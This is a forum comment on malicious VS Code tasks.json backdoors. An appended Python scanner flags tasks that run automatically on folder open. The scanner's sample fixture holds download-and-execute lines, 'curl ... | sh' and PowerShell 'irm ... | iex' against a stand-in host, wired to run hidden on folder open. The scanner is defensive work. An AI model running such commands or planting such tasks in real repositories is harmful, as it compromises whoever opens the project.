
Comment by fulafel

8 hours ago

The article doesn't claim it's executed straight up either ("can result"), but it's pretty ambiguous:

> When the project is opened, Visual Studio Code prompts the user to trust the repository author. If that trust is granted, the application automatically processes the repository’s tasks.json configuration file, which can result in embedded arbitrary commands being executed on the system.

In the screenshot the task is named "node" - so it's a bit like embedding a malicious Makefile target as a backdoor.

Except harder to spot since it's in an obscure .vscode/somethingsomething json file. (And probably you can easily fool GH Copilot to run it)
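As an added example (mine, not the commenter's and not code from the article quoted above): the mechanism that makes a tasks.json entry run without any further click is `"runOptions": {"runOn": "folderOpen"}`, which VS Code honours once the workspace is trusted, subject to the `task.allowAutomaticTasks` setting. The Python below takes a constructed `.vscode/tasks.json` (the file, the "node" label and the command are all made up for this example), strips the `//` and `/* */` comments and trailing commas that VS Code's JSONC accepts but `json.loads` rejects, then lists every auto-run task with its resolved command, including the per-OS `windows`/`linux`/`osx` overrides where a payload could be tucked away, and flags tasks whose terminal is configured not to be shown.

```python
"""Find VS Code tasks that start automatically when a folder is opened.

Added example: scans a tasks.json (JSONC) for runOptions.runOn == "folderOpen".
"""
import json

# Constructed sample tasks.json: one innocuous "build" task and one task that
# auto-runs on folder open with a hidden terminal. Made up for this example.
SAMPLE_TASKS_JSONC = r'''
{
    // See https://go.microsoft.com/fwlink/?LinkId=733558 for the format
    "version": "2.0.0",
    "tasks": [
        {
            "label": "node",                 /* looks like a harmless helper */
            "type": "shell",
            "command": "curl -s http://example.invalid/stage2 | sh",
            "windows": { "command": "powershell -c \"irm http://example.invalid/s2 | iex\"" },
            "runOptions": { "runOn": "folderOpen" },
            "presentation": { "reveal": "never" },   // do not show the terminal
        },
        {
            "label": "build",
            "type": "shell",
            "command": "npm run build",
        },
    ]
}
'''


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments and trailing commas outside string literals."""
    out = []
    i, n = 0, len(text)
    in_str = False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:        # copy the escaped char verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j < 0 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j < 0 else j + 2
        elif c in "}]":
            # drop a trailing comma (and whitespace) before a closing bracket
            while out and out[-1].isspace():
                out.pop()
            if out and out[-1] == ",":
                out.pop()
            out.append(c)
            i += 1
        else:
            out.append(c)
            i += 1
    return "".join(out)


def parse_jsonc(text: str) -> dict:
    """Parse VS Code-style JSONC into a Python dict."""
    return json.loads(strip_jsonc(text))


def _render_command(task: dict) -> str:
    """Join a task's command and args into one display string."""
    cmd = task.get("command", "")
    args = task.get("args", [])
    return " ".join([str(cmd), *map(str, args)]).strip()


def find_auto_run_tasks(jsonc_text: str) -> list:
    """Return every task VS Code would launch on folder open, with resolved commands."""
    doc = parse_jsonc(jsonc_text)
    hits = []
    for task in doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        commands = {"default": _render_command(task)}
        for os_key in ("windows", "linux", "osx"):      # per-OS overrides
            if isinstance(task.get(os_key), dict):
                commands[os_key] = _render_command({**task, **task[os_key]})
        reveal = (task.get("presentation") or {}).get("reveal")
        hits.append({
            "label": task.get("label"),
            "type": task.get("type"),
            "commands": commands,
            "hidden": reveal in ("never", "silent"),   # terminal not shown to the user
        })
    return hits


if __name__ == "__main__":
    for hit in find_auto_run_tasks(SAMPLE_TASKS_JSONC):
        print(f"[auto-run{' hidden' if hit['hidden'] else ''}] {hit['label']!r} ({hit['type']})")
        for os_name, cmd in hit["commands"].items():
            print(f"    {os_name}: {cmd}")
```

Run it against a checked-out repository's `.vscode/tasks.json` before granting workspace trust, or wire it into a pre-clone review step; anything it reports is a command that will execute as soon as the folder is opened in a trusted window, whether or not the label looks like a normal build step.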